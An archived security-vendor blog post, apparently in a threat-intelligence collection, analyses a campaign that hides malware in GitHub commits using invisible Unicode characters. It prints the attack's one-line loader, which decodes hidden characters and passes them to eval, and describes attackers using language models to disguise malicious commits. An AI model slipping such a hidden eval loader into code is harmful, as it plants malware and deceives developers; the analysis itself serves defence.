{
	"id": "bbc97c07-ba94-4c0f-b943-243e35fee71d",
	"created_at": "2026-04-29T02:20:40.896063Z",
	"updated_at": "2026-04-29T08:21:51.533289Z",
	"deleted_at": null,
	"sha1_hash": "62393c2680106fb560c96b29b8b60bf079563d80",
	"title": "The Return of the Invisible Threat: Hidden PUA Unicode Hits GitHub repositorties",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2584375,
	"plain_text": "The Return of the Invisible Threat: Hidden PUA Unicode Hits\r\nGitHub repositorties\r\nBy Ilyas Makari\r\nPublished: 2025-10-31 · Archived: 2026-04-29 02:11:37 UTC\r\nPublished on:\r\nOct 31, 2025\r\nIt wasn’t long ago that we uncovered compromised extensions on Open VSX . Now, a new wave of attacks is\r\nemerging, and all signs point to the same threat actor.\r\nThe technique will sound familiar: hidden malicious code injected with invisible Unicode Private Use Area (PUA)\r\ncharacters. We first saw this trick back in March when npm packages used PUAs to conceal payloads. Then came\r\nOpen VSX. Now, the attacker seems to have turned their sights on GitHub, and their methods are evolving. The\r\ndelivery is getting smarter, stealthier, and a lot more deceptive.\r\nTimeline of the Invisible Code Campaign\r\nMarch – Aikido first discovers malicious npm packages hiding payloads using PUA Unicode characters\r\nMay – We publish a blog detailing the risks of invisible Unicode and how it can be abused in supply chain\r\nattacks\r\nOctober 17 – We uncover compromised extensions on Open VSX using the same technique;\r\nOctober 18 - Koi Security analyzes the malware and payload, naming it Glassworm\r\nOctober 31 – We discover that the attackers have shifted focus to GitHub repositories\r\nStealth by Design\r\nWe were first alerted to this new wave when a developer reached out after noticing something strange: several of\r\nhis own GitHub repositories had been updated, by him, at least according to the commit history. The commits\r\nlooked legitimate. They contained realistic feature updates, small refactors, and even bug fixes that matched the\r\nproject’s coding style and commit messages. Apart from one difference, the email of the committer was set to\r\nnull . But at the end of these commits, each one had a single, identical addition:\r\nconst d=s=\u003e[...s].map(c=\u003e(c=c.codePointAt(0),c\u003e=0xFE00\u0026\u0026c\u003c=0xFE0F?c-0xFE00:c\u003e=0xE0100\u0026\u0026c\u003c=0xE01EF?c-0xE0100+16:null)).filter(b=\u003eb!==null);eval(Buffer.from(d(``)).toString('utf-8'));\r\nCan you spot the malware? At first glance it's hard to see what's going on, but what sticks out is the eval call,\r\nwhich is often used to execute code dynamically. Only the input to eval appears empty. However, the empty\r\nstring passed to d() in eval is not empty at all. It contains invisible Unicode characters, hidden code encoded\r\nwith Private Use Area symbols, just like in the previous npm and Open VSX incidents.\r\nhttps://www.aikido.dev/blog/the-return-of-the-invisible-threat-hidden-pua-unicode-hits-github-repositorties\r\nPage 1 of 6\n\nThis time, however, the delivery is far more subtle. Everything has been collapsed into a single line, leaving\r\nalmost no visual clue. The malicious code is tucked inside what looks like normal project activity, hidden within\r\nlegitimate commits.\r\nIt’s possible that the benign-looking changes were AI-generated to make the commits more convincing. Since\r\nthese commits were very project-specific, it suggest the attacker may have leveraged large language models to\r\ncraft realistic, context-aware code changes, effectively using AI to camouflage their payload within ordinary\r\ndevelopment activity.\r\nThe decoded PUA characters lead to a script that appears very similar to the Open VSX samples, which suggests\r\nwe are likely dealing with the same threat actor. The decoded script appears to use Solana as a delivery channel,\r\nfetching and executing a payload from the blockchain. Based on the Open VSX incidents, those payloads have\r\nbeen capable of stealing tokens and other secrets. If credentials or CI tokens are harvested, they could be reused to\r\npush the same payload in other repositories, which in turn could enable a worm-like propagation as we've seen\r\nwith previous attacks.\r\nSigns of a Larger Attack\r\nAfter identifying the malicious pattern, we started looking to see if the same payload appeared elsewhere. A quick\r\nsearch on GitHub for the pattern quickly revealed other repositories showing the same suspicious line.\r\nhttps://www.aikido.dev/blog/the-return-of-the-invisible-threat-hidden-pua-unicode-hits-github-repositorties\r\nPage 2 of 6\n\nIn these projects, a new commit had been pushed that looked entirely legitimate at first glance. The commits\r\ncontained normal changes such as documentation updates, version increases, and small code improvements, but\r\neach one also included the same hidden payload appended at the end of a file.\r\nFor now, this campaign seems to be limited to JavaScript projects hosted on GitHub. We have not observed any\r\nsigns of similar compromises in npm or other ecosystems, though we are monitoring it closely since the same\r\nattacker may attempt to expand their reach.\r\nEvolving Threats, Smarter Defenses\r\nThese incidents highlight the need for better awareness around Unicode misuse, especially the dangers of invisible\r\nPrivate Use Area characters. Developers can only defend against what they can see, and right now most tools are\r\nnot showing them enough. Neither GitHub’s web interface nor VS Code displayed any sign that something was\r\nwrong. In earlier cases, such as the Open VSX attacks, some IDEs did show subtle indicators next to the hidden\r\ncharacters, but those safeguards were missing here.\r\nWhile this technique is not new, it is clearly evolving. Earlier threats like Shai Hulud simply injected malicious\r\npostinstall scripts, making them relatively easy to detect. Now, attackers are blending malicious code with realistic\r\ncommits and project-specific improvements, possibly aided by AI to make their changes appear natural. It is a sign\r\nof where the threat landscape is heading.\r\nAt Aikido, we are adapting to that same evolution. We use large language models among other detection systems\r\nto spot these increasingly subtle threats. As attackers adopt AI to hide their intent, our defenses need to grow just\r\nas intelligent to uncover it.\r\nLast updated on:\r\nJan 7, 2026\r\nSecure your software now\r\nhttps://www.aikido.dev/blog/the-return-of-the-invisible-threat-hidden-pua-unicode-hits-github-repositorties\r\nPage 3 of 6\n\nStart today, for free.\r\nStart for Free\r\nNo CC required\r\n4.7/5\r\nTired of false positives?\r\nTry Aikido like 100k others.\r\nStart Now\r\nGet a personalized walkthrough\r\nTrusted by 100k+ teams\r\nBook Now\r\nScan your app for IDORs and real attack paths\r\nTrusted by 100k+ teams\r\nStart Scanning\r\nSee how AI pentests your app\r\nTrusted by 100k+ teams\r\nStart Testing\r\nApril 23, 2026\r\n•\r\nVulnerabilities \u0026 Threats\r\nIs Shai-Hulud Back? Compromised Bitwarden CLI Contains a Self-Propagating\r\nnpm Worm\r\nMalware found in @bitwarden/cli v2026.4.0 steals SSH keys, cloud secrets, and AI coding tool credentials, then\r\nspreads through victims' own npm packages. Inside: a worm calling itself \"Shai-Hulud: The Third Coming.\"\r\n#\r\nMalware\r\nhttps://www.aikido.dev/blog/the-return-of-the-invisible-threat-hidden-pua-unicode-hits-github-repositorties\r\nPage 4 of 6\n\nApril 22, 2026\r\n•\r\nVulnerabilities \u0026 Threats\r\nGPT-Proxy Backdoor in npm and PyPI turns Servers into Chinese LLM Relays\r\nA newly discovered npm and PyPI malware campaign installs hidden LLM proxies on compromised servers,\r\nturning them into relay nodes for LLM traffic.\r\n#\r\nMalware\r\nApril 17, 2026\r\n•\r\nVulnerabilities \u0026 Threats\r\nMultiple Cross-Site Scripting (XSS) Vulnerabilities in Mailcow\r\nAikido's AI pentest agent found three XSS vulnerabilities in Mailcow, one of which let unauthenticated attackers\r\ntake over administrator accounts. All issues have been patched as of version 2026-03b.\r\n#\r\nVulnerabilities\r\n#\r\nopen-source\r\nGet secure now\r\nSecure your code, cloud, and runtime in one central system.\r\nFind and fix vulnerabilities fast automatically.\r\nNo credit card required | Scan results in 32secs.\r\nhttps://www.aikido.dev/blog/the-return-of-the-invisible-threat-hidden-pua-unicode-hits-github-repositorties\r\nPage 5 of 6\n\nSource: https://www.aikido.dev/blog/the-return-of-the-invisible-threat-hidden-pua-unicode-hits-github-repositorties\r\nhttps://www.aikido.dev/blog/the-return-of-the-invisible-threat-hidden-pua-unicode-hits-github-repositorties\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.aikido.dev/blog/the-return-of-the-invisible-threat-hidden-pua-unicode-hits-github-repositorties"
	],
	"report_names": [
		"the-return-of-the-invisible-threat-hidden-pua-unicode-hits-github-repositorties"
	],
	"threat_actors": [],
	"ts_created_at": 1777429240,
	"ts_updated_at": 1777450911,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/62393c2680106fb560c96b29b8b60bf079563d80.pdf",
		"text": "https://archive.orkl.eu/62393c2680106fb560c96b29b8b60bf079563d80.txt",
		"img": "https://archive.orkl.eu/62393c2680106fb560c96b29b8b60bf079563d80.jpg"
	}
}